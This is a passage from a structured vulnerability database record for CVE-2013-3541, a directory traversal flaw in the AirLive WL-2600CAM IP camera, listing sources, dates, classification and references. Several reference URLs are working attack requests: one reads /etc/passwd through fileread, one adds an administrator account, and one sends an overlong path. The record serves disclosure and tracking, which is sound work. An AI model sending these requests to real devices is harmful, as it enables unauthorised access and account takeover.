"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-3541",
"trust": 3.5
},
{
"db": "BID",
"id": "60549",
"trust": 1.5
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004511",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2013-07700",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20130612 SECURITY ANALYSIS OF IP VIDEO SURVEILLANCE CAMERAS",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201306-346",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "122001",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "122983",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-07700"
},
{
"db": "BID",
"id": "60549"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004511"
},
{
"db": "PACKETSTORM",
"id": "122001"
},
{
"db": "PACKETSTORM",
"id": "122983"
},
{
"db": "CNNVD",
"id": "CNNVD-201306-346"
},
{
"db": "NVD",
"id": "CVE-2013-3541"
}
]
},
"id": "VAR-201310-0240",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-07700"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-07700"
}
]
},
"last_update_date": "2024-11-23T21:27:57.111000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "WL-2600CAM",
"trust": 0.8,
"url": "http://cz.airlive.com/product/WL-2600CAM"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004511"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004511"
},
{
"db": "NVD",
"id": "CVE-2013-3541"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://seclists.org/fulldisclosure/2013/jun/84"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3541"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-3541"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/60549"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3541"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3540"
},
{
"trust": 0.1,
"url": "http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1\u0026pwd=test1\u0026grp=administrator\u0026sgrp=ptz\u0026action=add\u0026redirect="
},
{
"trust": 0.1,
"url": "http://xx.xx.xx.xx/cgi-bin/operator/param?action=list\u0026group=general.userid"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3687"
},
{
"trust": 0.1,
"url": "http://xx.xx.xx.xx/cgi-bin/admin/fileread?read.filepath=../../../../etc/passwd"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3686"
},
{
"trust": 0.1,
"url": "http://xx.xx.xx.xx/[a*3000]"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4933"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4288"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4049"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3542"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4292"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0066"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4081"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4292"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0068"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4922"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4298"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4289"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4296"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0042"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4293"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0043"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4924"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4078"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4297"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4932"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4287"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4080"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4082"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0041"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4287"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4931"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3556"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0043"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3548"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4048"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4928"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0042"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4285"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0067"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4291"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0068"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4083"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4936"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4926"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3548"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4923"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4920"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4286"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3558"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4927"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4935"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4074"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3556"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4295"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4294"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4048"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4295"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4286"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4077"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4291"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3555"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4929"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4921"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3559"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3557"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4285"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4049"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/glsa/glsa-201308-05.xml"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4289"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4290"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3542"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0041"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4294"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4076"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4925"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4934"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4290"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4075"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4296"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3555"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3540"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4930"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0067"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4298"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0066"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4293"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4288"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4297"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4079"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-07700"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004511"
},
{
"db": "PACKETSTORM",
"id": "122001"
},
{
"db": "PACKETSTORM",
"id": "122983"
},
{
"db": "CNNVD",
"id": "CNNVD-201306-346"
},
{
"db": "NVD",
"id": "CVE-2013-3541"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-07700"
},
{
"db": "BID",
"id": "60549"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004511"
},
{
"db": "PACKETSTORM",
"id": "122001"
},
{
"db": "PACKETSTORM",
"id": "122983"
},
{
"db": "CNNVD",
"id": "CNNVD-201306-346"
},
{
"db": "NVD",
"id": "CVE-2013-3541"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-07700"
},
{
"date": "2013-06-12T00:00:00",
"db": "BID",
"id": "60549"
},
{
"date": "2013-10-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004511"
},
{
"date": "2013-06-13T05:42:00",
"db": "PACKETSTORM",
"id": "122001"
},
{
"date": "2013-08-29T02:49:21",
"db": "PACKETSTORM",
"id": "122983"
},
{
"date": "2013-06-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201306-346"
},
{
"date": "2013-10-04T23:55:03.877000",
"db": "NVD",
"id": "CVE-2013-3541"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-07700"
},
{
"date": "2013-08-30T00:13:00",
"db": "BID",
"id": "60549"
},
{
"date": "2013-10-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004511"
},
{
"date": "2013-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201306-346"
},
{
"date": "2024-11-21T01:53:51.413000",
"db": "NVD",
"id": "CVE-2013-3541"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "122983"
},
{
"db": "CNNVD",
"id": "CNNVD-201306-346"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AirLive WL-2600CAM Model of cgi-bin/admin/fileread Vulnerable to directory traversal",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004511"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201306-346"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.